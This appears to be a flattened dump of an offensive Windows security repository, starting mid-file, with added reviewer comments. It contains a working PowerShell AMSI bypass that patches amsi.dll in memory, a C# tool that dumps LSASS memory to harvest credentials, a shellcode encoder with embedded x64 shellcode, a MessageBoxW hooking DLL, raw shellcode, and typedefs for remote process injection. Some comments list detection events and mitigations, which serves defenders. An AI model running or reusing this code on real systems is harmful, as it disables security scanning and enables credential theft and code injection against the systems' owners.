31 | "\x4C\x4C\x00\x49\x8B\xCC\x41\xFF\xD7\x49\x8B\xCC\x48\x8B\xD6"
32 | "\xE9\x14\xFF\xFF\xFF\x48\x03\xC3\x48\x83\xC4\x28\xC3";
--------------------------------------------------------------------------------
/PowerShell/amsi-bypass.ps1:
--------------------------------------------------------------------------------
# LookupFunc: returns the address of export $functionName in the already
# loaded module $moduleName. It does this without Add-Type or a P/Invoke
# declaration: it reflects into System.dll's Microsoft.Win32.UnsafeNativeMethods
# type and invokes that type's GetModuleHandle and GetProcAddress methods.
# Defender note: reflection access to UnsafeNativeMethods from a script is
# itself unusual and shows up in script block logs.
1 | function LookupFunc {
2 |
3 | Param ($moduleName, $functionName)
4 |
5 | $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
6 | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].
7 | Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
# Collect the methods named GetProcAddress and use the first one found.
8 | $tmp=@()
9 | $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
10 | return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName))
11 | }
12 |
# getDelegateType: builds a delegate type at run time and returns it.
#   $func    - array of parameter types for the delegate's Invoke method.
#   $delType - return type of Invoke (defaults to [Void]).
# The type is emitted into a dynamic, run-only assembly, so nothing is written
# to disk. The fixed names 'ReflectedDelegate', 'InMemoryModule' and
# 'MyDelegateType' are stable strings that can be searched for in script block logs.
13 | function getDelegateType {
14 |
15 | Param (
16 | [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
17 | [Parameter(Position = 1)] [Type] $delType = [Void]
18 | )
19 |
20 | $type = [AppDomain]::CurrentDomain.
21 | DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
22 | [System.Reflection.Emit.AssemblyBuilderAccess]::Run).
23 | DefineDynamicModule('InMemoryModule', $false).
24 | DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',
25 | [System.MulticastDelegate])
26 |
# Constructor and Invoke are both marked as runtime-implemented.
27 | $type.
28 | DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func).
29 | SetImplementationFlags('Runtime, Managed')
30 |
31 | $type.
32 | DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
33 | SetImplementationFlags('Runtime, Managed')
34 |
35 | return $type.CreateType()
36 | }
37 |
# Script body: patches the first 3 bytes of amsi.dll!AmsiOpenSession in the
# current process. Presumably the aim is to make session setup fail so later
# content in this process is not submitted for scanning; verify against the
# AMSI version in use.
# Defender notes: the patch is in-memory only, so comparing the loaded
# amsi.dll code with the file on disk reveals it. With script block logging
# enabled (event ID 4104), this text is recorded when it is compiled, before
# the patch takes effect.
38 | [IntPtr]$funcAddr = LookupFunc amsi.dll AmsiOpenSession
39 | $oldProtectionBuffer = 0
# Wrap kernel32!VirtualProtect in a delegate (IntPtr, UInt32, UInt32, ref UInt32) -> Bool.
40 | $vp=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualProtect), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32].MakeByRefType()) ([Bool])))
# 0x40 = PAGE_EXECUTE_READWRITE on the 3 bytes to be changed.
41 | $vp.Invoke($funcAddr, 3, 0x40, [ref]$oldProtectionBuffer)
42 |
# 48 31 C0 encodes `xor rax, rax`.
43 | $buf = [Byte[]] (0x48, 0x31, 0xC0)
44 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $funcAddr, 3)
# 0x20 = PAGE_EXECUTE_READ; the previously saved protection value is not reused.
45 | $vp.Invoke($funcAddr, 3, 0x20, [ref]$oldProtectionBuffer)
--------------------------------------------------------------------------------
/ProcDump/ProcDump/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.Runtime.InteropServices;
4 | using System.IO;
5 |
// LsassDump: console program that writes a minidump of the lsass process to
// the file path given as the first argument.
// Defender notes: the observable events are (1) OpenProcess on lsass.exe with
// access mask 0x001F0FFF, visible as Sysmon Event ID 10 (ProcessAccess) with
// TargetImage lsass.exe, (2) Dbghelp.dll loaded by an unexpected process and
// (3) a new dump-sized file written by that process. LSA protection (RunAsPPL),
// Credential Guard and the ASR rule "Block credential stealing from the Windows
// local security authority subsystem (lsass.exe)" are the usual mitigations.
6 | namespace LsassDump
7 | {
8 | class Program
9 | {
// Main: args[0] is the output path; prints usage and returns when it is missing.
10 | static void Main(string[] args)
11 | {
12 | if (args.Length < 1)
13 | {
14 | Console.WriteLine("[*] Usage: Program.exe ");
15 | return;
16 | }
17 |
18 |
19 | // Create a file for the dumped content of lsass
20 | string fLocation = $"{args[0]}";
21 |
22 | Console.WriteLine($"[+] Dumping contents to: {fLocation}");
23 |
// FileMode.Create overwrites an existing file; the stream is never disposed.
24 | FileStream dumpFile = new FileStream(fLocation, FileMode.Create);
25 |
26 | // Grab the lsass process PID
// lsass[0] is read without checking that the array is non-empty.
27 | Process[] lsass = Process.GetProcessesByName("lsass");
28 | int lsass_pid = lsass[0].Id;
29 | Console.WriteLine($"[*] LSASS PID: {lsass_pid}");
30 |
31 | // Attach to the process and dump contents
32 | // 0x001F0FFF = ALL_ACCESS
// The returned handle is not checked and never closed.
// DumpType 2 is MiniDumpWithFullMemory.
33 | IntPtr handle = OpenProcess(0x001F0FFF, false, lsass_pid);
34 | bool dumped = MiniDumpWriteDump(handle, lsass_pid, dumpFile.SafeFileHandle.DangerousGetHandle(), 2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
35 |
36 | if (dumped == false)
37 | {
// The DllImport declarations below do not set SetLastError, so the value
// printed here is not guaranteed to belong to the failed call.
38 | Console.WriteLine("[-] Dumping failed ! Error: {0}", Marshal.GetLastWin32Error());
39 | return;
40 | }
41 |
42 | Console.WriteLine($"[+] LSASS dumped to: {fLocation}");
43 | }
44 |
// P/Invoke declaration for MiniDumpWriteDump exported by Dbghelp.dll.
45 | [DllImport("Dbghelp.dll")]
46 | static extern bool MiniDumpWriteDump(IntPtr hProcess, int ProcessId, IntPtr hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);
47 |
// P/Invoke declaration for OpenProcess exported by kernel32.dll.
48 | [DllImport("kernel32.dll")]
49 | static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);
50 |
// Declared but not called anywhere in this class.
51 | [DllImport("kernel32.dll")]
52 | static extern uint GetLastError();
53 | }
54 | }
55 |
--------------------------------------------------------------------------------
/C++/Caesar_Encrypter/Caesar_Encrypter.cpp:
--------------------------------------------------------------------------------
1 | #include
2 |
3 | #pragma warning(disable:4996)
4 |
5 | unsigned char rawbuf[] =
6 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
7 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
8 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
9 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
10 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
11 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
12 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
13 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
14 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
15 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
16 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
17 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
18 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
19 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
20 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
21 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
22 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
23 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
24 | "\x63\x2e\x65\x78\x65\x00";
25 |
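/*
 * Prints rawbuf as a C string literal in which every byte has a fixed value
 * added to it modulo 256 (a single-byte additive "Caesar" shift).
 *
 * Memory-safety fix: the original stored each result in
 * `unsigned char encodedBytes[] = {0};`, a one-element array, and indexed it
 * with the loop counter, writing past the end of the array on the stack for
 * every i > 0. The shifted byte is only needed for the printf that follows,
 * so it is now held in a scalar.
 *
 * Review note: a fixed single-byte shift is an encoding, not encryption.
 * There are only 256 possible shifts and no secret key, so the original
 * bytes are recoverable by anyone who has the output.
 *
 * argc and argv are unused.
 */
int main(int argc, char* argv[])
{
    (void)argc;
    (void)argv;

    /* The value actually added to each byte. The original inline comment
       called the modifier "2", which did not match the code. */
    const unsigned int shift = 53;

    /* sizeof counts the string literal's terminating NUL, so that byte is
       reported in the size and shifted along with the rest. */
    int Size = sizeof(rawbuf);

    printf("[*] Shellcode Size: %i\n", Size);
    printf("[*] Encrypted Bytes: \n");
    printf("unsigned char buf[] = \"");

    /* Shift and print one byte at a time; nothing is buffered. */
    for (int i = 0; i < Size; i++) {
        unsigned char encoded = (unsigned char)(((unsigned int)rawbuf[i] + shift) & 0xFF);
        printf("\\x%02hhx", encoded);
    }
    printf("\";\n");

    /* The inverse operation subtracts the same shift modulo 256. The
       commented-out decode loop in the original subtracted 2 from an
       undeclared `encbuf`, which matched neither the shift used above nor
       any buffer in this file. */

    return 0;
}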
50 |
--------------------------------------------------------------------------------
/C++/API_Hooking/Detours/HookExe/hookintoexe.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | A WINAPI* pointer is defined which will be assigned to MessageBoxW API.
3 | When the DLL is injected into a running process, it will look for
4 | the MessageBoxW API call and hook into it.
5 | A printf() function will run to say that the hook was attached.
6 |
7 | Upon unhooking, the process will terminate and if more MessageBoxW API calls are in the
8 | EXE, then none will be executed and program will be terminated
9 | */
10 | #include
11 | #include
12 |
13 | #include "detours/detours.h"
14 |
15 | #pragma comment(lib, "user32.lib")
16 |
// Pointer to the original MessageBoxW. Its address is handed to
// DetourAttach() and DetourDetach() in the functions below, so the detour
// library can redirect it; after a successful attach it is the way to reach
// the unhooked implementation.
// NOTE(review): the text parameters are declared LPCTSTR. That is the same
// type as MessageBoxW's LPCWSTR only when UNICODE is defined; LPCWSTR would
// state the intent independently of build settings.
int (WINAPI* pOrigMessageBoxW)(HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType) = MessageBoxW;
19 |
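// Replacement for MessageBoxW installed by the detour.
//
// Shows no dialog: it prints a marker line and reports IDOK, so the caller
// behaves as if the user had pressed OK. All four parameters are ignored.
//
// The function is declared WINAPI so that its calling convention matches the
// API it replaces. The original omitted it; on 32-bit x86 that leaves a
// default-convention function answering calls made with the WINAPI
// convention, and the two disagree on who cleans up the argument stack.
// On x64 there is a single convention and the keyword has no effect.
int WINAPI HookedMessageBox(HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType)
{
    (void)hWnd;
    (void)lpText;
    (void)lpCaption;
    (void)uType;

    printf("HookedMessageBox() called. No popup on screen!\n");

    return IDOK;
}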
28 |
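// Install the detour on MessageBoxW.
//
// Runs one Detours transaction that attaches HookedMessageBox to
// pOrigMessageBoxW for the current thread.
//
// Returns TRUE when DetourTransactionCommit() reports NO_ERROR and FALSE
// otherwise. The original returned TRUE unconditionally and printed
// "hooked!" even when the commit had failed.
//
// NOTE(review): this is called from DllMain during DLL_PROCESS_ATTACH.
// Microsoft's guidance is to keep work inside DllMain minimal, so the
// printf calls are best treated as demo-only.
BOOL Hookem(void)
{
    LONG err;

    DetourTransactionBegin();
    DetourUpdateThread(GetCurrentThread());
    DetourAttach(&(PVOID&)pOrigMessageBoxW, HookedMessageBox);

    // The commit result is the only status this function inspects.
    err = DetourTransactionCommit();
    if (err != NO_ERROR) {
        printf("MessageBox() hook failed! (res = %ld)\n", err);
        return FALSE;
    }

    // %ld matches LONG; the original used %d.
    printf("MessageBox() hooked! (res = %ld)\n", err);

    return TRUE;
}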
45 |
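// Remove the detour from MessageBoxW and restore the original code.
//
// Runs one Detours transaction that detaches HookedMessageBox from
// pOrigMessageBoxW for the current thread.
//
// Returns TRUE when DetourTransactionCommit() reports NO_ERROR and FALSE
// otherwise. The original returned TRUE unconditionally and printed
// "Hook removed" even when the commit had failed.
BOOL UnHookem(void)
{
    LONG err;

    DetourTransactionBegin();
    DetourUpdateThread(GetCurrentThread());
    DetourDetach(&(PVOID&)pOrigMessageBoxW, HookedMessageBox);

    // The commit result is the only status this function inspects.
    err = DetourTransactionCommit();
    if (err != NO_ERROR) {
        printf("Hook removal from MessageBox() failed with result = %ld\n", err);
        return FALSE;
    }

    // %ld matches LONG; the original used %d.
    printf("Hook removed from MessageBox() with result = %ld\n", err);

    return TRUE;
}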
62 |
// DLL entry point.
//
// Installs the MessageBoxW detour when the DLL is mapped into a process and
// removes it when the DLL is unmapped. Thread attach/detach notifications
// need no work. hinst and reserved are unused. Always returns TRUE; the
// results of Hookem() and UnHookem() are not consulted.
BOOL WINAPI DllMain(HINSTANCE hinst,
                    DWORD dwReason,
                    LPVOID reserved)
{
    if (dwReason == DLL_PROCESS_ATTACH) {
        // Process-wide setup: place the hook.
        Hookem();
    }
    else if (dwReason == DLL_PROCESS_DETACH) {
        // Process-wide teardown: restore the original function.
        UnHookem();
    }
    // DLL_THREAD_ATTACH and DLL_THREAD_DETACH: nothing to do.

    return TRUE;
}
86 |
87 |
--------------------------------------------------------------------------------
/shellcodes/MessageBox/messagebox-64-git.txt:
--------------------------------------------------------------------------------
1 | Payload size: 434 bytes
2 | unsigned char shellcode[] =
3 | "\x48\x83\xEC\x28\x48\x83\xE4\xF0\x48\x8D\x15\x66\x00\x00\x00"
4 | "\x48\x8D\x0D\x52\x00\x00\x00\xE8\x9E\x00\x00\x00\x4C\x8B\xF8"
5 | "\x48\x8D\x0D\x5D\x00\x00\x00\xFF\xD0\x48\x8D\x15\x5F\x00\x00"
6 | "\x00\x48\x8D\x0D\x4D\x00\x00\x00\xE8\x7F\x00\x00\x00\x4D\x33"
7 | "\xC9\x4C\x8D\x05\x61\x00\x00\x00\x48\x8D\x15\x4E\x00\x00\x00"
8 | "\x48\x33\xC9\xFF\xD0\x48\x8D\x15\x56\x00\x00\x00\x48\x8D\x0D"
9 | "\x0A\x00\x00\x00\xE8\x56\x00\x00\x00\x48\x33\xC9\xFF\xD0\x4B"
10 | "\x45\x52\x4E\x45\x4C\x33\x32\x2E\x44\x4C\x4C\x00\x4C\x6F\x61"
11 | "\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x55\x53\x45\x52\x33"
12 | "\x32\x2E\x44\x4C\x4C\x00\x4D\x65\x73\x73\x61\x67\x65\x42\x6F"
13 | "\x78\x41\x00\x48\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64\x00"
14 | "\x4D\x65\x73\x73\x61\x67\x65\x00\x45\x78\x69\x74\x50\x72\x6F"
15 | "\x63\x65\x73\x73\x00\x48\x83\xEC\x28\x65\x4C\x8B\x04\x25\x60"
16 | "\x00\x00\x00\x4D\x8B\x40\x18\x4D\x8D\x60\x10\x4D\x8B\x04\x24"
17 | "\xFC\x49\x8B\x78\x60\x48\x8B\xF1\xAC\x84\xC0\x74\x26\x8A\x27"
18 | "\x80\xFC\x61\x7C\x03\x80\xEC\x20\x3A\xE0\x75\x08\x48\xFF\xC7"
19 | "\x48\xFF\xC7\xEB\xE5\x4D\x8B\x00\x4D\x3B\xC4\x75\xD6\x48\x33"
20 | "\xC0\xE9\xA7\x00\x00\x00\x49\x8B\x58\x30\x44\x8B\x4B\x3C\x4C"
21 | "\x03\xCB\x49\x81\xC1\x88\x00\x00\x00\x45\x8B\x29\x4D\x85\xED"
22 | "\x75\x08\x48\x33\xC0\xE9\x85\x00\x00\x00\x4E\x8D\x04\x2B\x45"
23 | "\x8B\x71\x04\x4D\x03\xF5\x41\x8B\x48\x18\x45\x8B\x50\x20\x4C"
24 | "\x03\xD3\xFF\xC9\x4D\x8D\x0C\x8A\x41\x8B\x39\x48\x03\xFB\x48"
25 | "\x8B\xF2\xA6\x75\x08\x8A\x06\x84\xC0\x74\x09\xEB\xF5\xE2\xE6"
26 | "\x48\x33\xC0\xEB\x4E\x45\x8B\x48\x24\x4C\x03\xCB\x66\x41\x8B"
27 | "\x0C\x49\x45\x8B\x48\x1C\x4C\x03\xCB\x41\x8B\x04\x89\x49\x3B"
28 | "\xC5\x7C\x2F\x49\x3B\xC6\x73\x2A\x48\x8D\x34\x18\x48\x8D\x7C"
29 | "\x24\x30\x4C\x8B\xE7\xA4\x80\x3E\x2E\x75\xFA\xA4\xC7\x07\x44"
30 | "\x4C\x4C\x00\x49\x8B\xCC\x41\xFF\xD7\x49\x8B\xCC\x48\x8B\xD6"
31 | "\xE9\x14\xFF\xFF\xFF\x48\x03\xC3\x48\x83\xC4\x28\xC3";
--------------------------------------------------------------------------------
/C++/Heaven's_Gate/pfndef.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include
4 |
// Function-pointer typedefs. Each parameter list mirrors the Win32 API named
// after the `pfn` prefix. Only the types are declared in this header; how the
// pointers are obtained and called is not visible here (presumably they are
// resolved at run time by the including source; confirm there).
//
// Review note for defenders: the set below covers process enumeration
// (CreateToolhelp32Snapshot, Process32FirstW/NextW), opening a process,
// allocating and writing memory in it, changing page protection and starting
// or resuming a thread. Code that reaches these APIs through pointers does
// not need them in its import table, so import-based static triage alone is
// not a reliable indicator; behavioural telemetry on the calls themselves is.

// Signature of VirtualProtectEx: change page protection in a given process.
typedef BOOL (WINAPI* pfnVirtualProtectEx)(
    IN HANDLE hProcess,
    IN LPVOID lpAddress,
    IN SIZE_T dwSize,
    IN DWORD flNewProtect,
    OUT PDWORD lpflOldProtect
);

// Signature of WriteProcessMemory: copy a buffer into a given process.
typedef BOOL (WINAPI* pfnWriteProcessMemory)(
    IN HANDLE hProcess,
    IN LPVOID lpBaseAddress,
    IN LPCVOID lpBuffer,
    IN SIZE_T nSize,
    OUT SIZE_T* lpNumberOfBytesWritten
);

// Signature of VirtualAllocEx: reserve/commit memory in a given process.
typedef LPVOID (WINAPI* pfnVirtualAllocEx)(
    IN HANDLE hProcess,
    IN OPTIONAL LPVOID lpAddress,
    IN SIZE_T dwSize,
    IN DWORD flAllocationType,
    IN DWORD flProtect
);

// Signature of VirtualAlloc: reserve/commit memory in the calling process.
typedef LPVOID (WINAPI* pfnVirtualAlloc)(
    IN OPTIONAL LPVOID lpAddress,
    IN SIZE_T dwSize,
    IN DWORD flAllocationType,
    IN DWORD flProtect
);

// Signature of VirtualFree: release or decommit memory in the calling process.
typedef BOOL (WINAPI* pfnVirtualFree)(
    IN LPVOID lpAddress,
    IN SIZE_T dwSize,
    IN DWORD dwFreeType
);

// Signature of OpenProcess: obtain a handle to a process by id.
typedef HANDLE (WINAPI* pfnOpenProcess)(
    IN DWORD dwDesiredAccess,
    IN BOOL bInheritHandle,
    IN DWORD dwProcessId
);

// Signature of CreateRemoteThread: start a thread in a given process.
typedef HANDLE (WINAPI* pfnCreateRemoteThread)(
    IN HANDLE hProcess,
    IN LPSECURITY_ATTRIBUTES lpThreadAttributes,
    IN SIZE_T dwStackSize,
    IN LPTHREAD_START_ROUTINE lpStartAddress,
    IN LPVOID lpParameter,
    IN DWORD dwCreationFlags,
    OUT LPDWORD lpThreadId
);

// Signature of CreateToolhelp32Snapshot: take a snapshot for enumeration.
typedef HANDLE (WINAPI* pfnCreateToolhelp32Snapshot)(
    IN DWORD dwFlags,
    IN DWORD th32ProcessID
);

// Signature of Process32FirstW: read the first process entry of a snapshot.
typedef BOOL (WINAPI* pfnProcess32FirstW)(
    IN HANDLE hSnapshot,
    IN OUT LPPROCESSENTRY32W lppe
);

// Signature of Process32NextW: read the next process entry of a snapshot.
typedef BOOL (WINAPI* pfnProcess32NextW)(
    IN HANDLE hSnapshot,
    OUT LPPROCESSENTRY32W lppe
);

// Signature of CloseHandle: close an object handle.
typedef BOOL (WINAPI* pfnCloseHandle)(
    IN HANDLE hObject
);

// Signature of ResumeThread: decrement a thread's suspend count.
typedef DWORD (WINAPI* pfnResumeThread)(
    IN HANDLE hThread
);
--------------------------------------------------------------------------------
/PSLangBypass/PSLangBypass.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31424.327
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PSLangBypass", "PSLangBypass\PSLangBypass.csproj", "{C10F38A5-FE8E-4D99-AA8B-240F935778E5}"
7 | EndProject
8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PSLangBypass_SpawnShell", "PSLangBypass_SpawnShell\PSLangBypass_SpawnShell.csproj", "{9C213991-B733-4907-BE3F-03D8317ADE11}"
9 | EndProject
10 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PSLangBypass_InstallUtil_Bypass", "PSLangBypass_InstallUtil_Bypass\PSLangBypass_InstallUtil_Bypass.csproj", "{9256A08B-3FE0-4746-B6EE-050183C4EAFE}"
11 | EndProject
12 | Global
13 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
14 | Debug|Any CPU = Debug|Any CPU
15 | Release|Any CPU = Release|Any CPU
16 | EndGlobalSection
17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
18 | {C10F38A5-FE8E-4D99-AA8B-240F935778E5}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
19 | {C10F38A5-FE8E-4D99-AA8B-240F935778E5}.Debug|Any CPU.Build.0 = Debug|Any CPU
20 | {C10F38A5-FE8E-4D99-AA8B-240F935778E5}.Release|Any CPU.ActiveCfg = Release|x64
21 | {C10F38A5-FE8E-4D99-AA8B-240F935778E5}.Release|Any CPU.Build.0 = Release|x64
22 | {9C213991-B733-4907-BE3F-03D8317ADE11}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
23 | {9C213991-B733-4907-BE3F-03D8317ADE11}.Debug|Any CPU.Build.0 = Debug|Any CPU
24 | {9C213991-B733-4907-BE3F-03D8317ADE11}.Release|Any CPU.ActiveCfg = Release|Any CPU
25 | {9C213991-B733-4907-BE3F-03D8317ADE11}.Release|Any CPU.Build.0 = Release|Any CPU
26 | {9256A08B-3FE0-4746-B6EE-050183C4EAFE}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
27 | {9256A08B-3FE0-4746-B6EE-050183C4EAFE}.Debug|Any CPU.Build.0 = Debug|Any CPU
28 | {9256A08B-3FE0-4746-B6EE-050183C4EAFE}.Release|Any CPU.ActiveCfg = Release|x64
29 | {9256A08B-3FE0-4746-B6EE-050183C4EAFE}.Release|Any CPU.Build.0 = Release|x64
30 | EndGlobalSection
31 | GlobalSection(SolutionProperties) = preSolution
32 | HideSolutionNode = FALSE
33 | EndGlobalSection
34 | GlobalSection(ExtensibilityGlobals) = postSolution
35 | SolutionGuid = {970F1603-B3A1-4324-A454-2E48B759E80F}
36 | EndGlobalSection
37 | EndGlobal
38 |
--------------------------------------------------------------------------------